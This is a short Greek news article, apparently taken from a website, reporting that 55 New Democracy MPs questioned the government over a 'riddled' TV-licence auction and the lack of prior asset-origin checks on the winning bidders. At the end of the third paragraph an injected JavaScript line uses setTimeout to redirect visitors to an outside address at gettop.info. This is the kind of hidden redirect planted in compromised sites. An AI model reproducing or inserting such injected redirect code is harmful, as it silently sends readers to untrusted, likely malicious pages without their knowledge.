55 βουλευτές ΝΔ: «Διάτρητη» η διαδικασία αδειοδότησης των καναλιών

0
4

 

Σήμερα, 55 βουλευτές της ΝΔ κατέθεσαν νέα ερώτηση για την αδειοδότηση των καναλιών ζητώντας από την κυβέρνηση να δώσει άμεσες και συγκεκριμένες απαντήσεις για τους χειρισμούς της σε ό,τι αφορά τον πλειστηριασμό των τηλεοπτικών αδειών και ειδικότερα τα ζητήματα του ελέγχου του πόθεν έσχες των υπερθεματιστών, όπως οφείλει.

Ειδικότερα, με την ερώτησή τους προς τον πρωθυπουργό και τους συναρμόδιους υπουργούς Οικονομικών και Δικαιοσύνης – Διαφάνειας – Ανθρώπινων Δικαιωμάτων, οι βουλευτές της Νέας Δημοκρατίας υπογραμμίζουν ότι η διαδικασία που εφαρμόστηκε είναι διάτρητη.

Επισημαίνουν ότι δεν προηγήθηκε -όπως επιβάλλει η έννομη τάξη και η κοινή λογική- ο έλεγχος του πόθεν έσχες και η απόφαση του ΣτΕ για τη συνταγματικότητα. Υπογραμμίζουν, ταυτοχρόνως, ότι η αναγκαιότητα για προγενέστερο έλεγχο του πόθεν έσχες πήρε επιτακτικό χαρακτήρα μετά τις καταγγελίες Πάνου Καμμένου για «μαύρο χρήμα» ενός από τους υπερθεματιστές. Επισημαίνουν, ότι η κυβέρνηση επέλεξε μια διαδικασία που «χαρακτηρίζεται από αυθαιρεσία, δημιουργώντας εύλογα για διαπλοκή και εξυπηρέτηση σκοπιμοτήτων». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here